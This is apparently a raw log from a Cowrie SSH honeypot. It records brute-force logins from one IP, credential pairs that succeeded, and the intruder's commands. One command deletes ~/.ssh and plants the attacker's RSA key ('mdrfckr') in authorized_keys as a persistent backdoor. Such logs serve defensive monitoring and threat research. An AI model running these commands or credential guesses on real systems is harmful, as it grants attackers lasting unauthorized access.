{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:49:41.614253Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60866,"dst_ip":"1.2.3.4","dst_port":22,"session":"f872c641e1e3","protocol":"ssh","message":"New connection: 212.227.235.229:60866 (1.2.3.4:22) [session: f872c641e1e3]","sensor":"my-vps","timestamp":"2025-08-28T15:49:41.785011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:49:41.785781Z","src_ip":"212.227.235.229","session":"f872c641e1e3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T15:49:41.889344Z","src_ip":"212.227.235.229","session":"f872c641e1e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40538,"dst_ip":"1.2.3.4","dst_port":22,"session":"48a2f70a78c0","protocol":"ssh","message":"New connection: 212.227.235.229:40538 (1.2.3.4:22) [session: 48a2f70a78c0]","sensor":"my-vps","timestamp":"2025-08-28T15:49:41.921422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:49:41.922772Z","src_ip":"212.227.235.229","session":"48a2f70a78c0"}
{"eventid":"cowrie.login.failed","username":"node","password":"node","message":"login attempt [node/node] failed","sensor":"my-vps","timestamp":"2025-08-28T15:49:42.202021Z","src_ip":"212.227.235.229","session":"f872c641e1e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:49:42.229382Z","src_ip":"212.227.235.229","session":"48a2f70a78c0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:49:43.307124Z","src_ip":"212.227.235.229","session":"f872c641e1e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:49:43.496345Z","src_ip":"212.227.235.229","session":"48a2f70a78c0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:49:44.828151Z","src_ip":"212.227.235.229","session":"48a2f70a78c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40554,"dst_ip":"1.2.3.4","dst_port":22,"session":"00a3e8e82d65","protocol":"ssh","message":"New connection: 212.227.235.229:40554 (1.2.3.4:22) [session: 00a3e8e82d65]","sensor":"my-vps","timestamp":"2025-08-28T15:49:45.145921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:49:45.147204Z","src_ip":"212.227.235.229","session":"00a3e8e82d65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:49:45.466058Z","src_ip":"212.227.235.229","session":"00a3e8e82d65"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:49:46.766761Z","src_ip":"212.227.235.229","session":"00a3e8e82d65"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:49:47.082057Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:49:47.083076Z","src_ip":"212.227.235.229","session":"00a3e8e82d65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58396,"dst_ip":"1.2.3.4","dst_port":22,"session":"69b6ecac99c7","protocol":"ssh","message":"New connection: 212.227.235.229:58396 (1.2.3.4:22) [session: 69b6ecac99c7]","sensor":"my-vps","timestamp":"2025-08-28T15:50:18.076554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:50:18.077446Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:50:18.291062Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.login.success","username":"root","password":"123Admin","message":"login attempt [root/123Admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:50:19.188303Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:50:20.020660Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:50:20.021392Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:50:20.022612Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:20.237910Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:50:20.684437Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:50:20.685143Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:50:20.901152Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:20.902022Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58406,"dst_ip":"1.2.3.4","dst_port":22,"session":"18fc7e6f6e7c","protocol":"ssh","message":"New connection: 212.227.235.229:58406 (1.2.3.4:22) [session: 18fc7e6f6e7c]","sensor":"my-vps","timestamp":"2025-08-28T15:50:21.099214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:50:21.100022Z","src_ip":"212.227.235.229","session":"18fc7e6f6e7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:50:21.306383Z","src_ip":"212.227.235.229","session":"18fc7e6f6e7c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:50:22.172750Z","src_ip":"212.227.235.229","session":"18fc7e6f6e7c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:23.381551Z","src_ip":"212.227.235.229","session":"18fc7e6f6e7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58412,"dst_ip":"1.2.3.4","dst_port":22,"session":"00572748f879","protocol":"ssh","message":"New connection: 212.227.235.229:58412 (1.2.3.4:22) [session: 00572748f879]","sensor":"my-vps","timestamp":"2025-08-28T15:50:23.585646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:50:23.586474Z","src_ip":"212.227.235.229","session":"00572748f879"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:50:23.791791Z","src_ip":"212.227.235.229","session":"00572748f879"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:50:24.654794Z","src_ip":"212.227.235.229","session":"00572748f879"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:24.862044Z","src_ip":"212.227.235.229","session":"00572748f879"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:24.870387Z","src_ip":"212.227.235.229","session":"69b6ecac99c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34716,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9c3b7cb77ea","protocol":"ssh","message":"New connection: 212.227.235.229:34716 (1.2.3.4:22) [session: b9c3b7cb77ea]","sensor":"my-vps","timestamp":"2025-08-28T15:50:43.568545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:50:43.569443Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:50:43.794132Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Ht123456.","message":"login attempt [root/Ht123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:50:44.733659Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:50:45.205154Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:50:45.205884Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:50:45.207092Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:45.434186Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:50:45.942564Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:50:45.943290Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:50:46.170854Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:46.171755Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
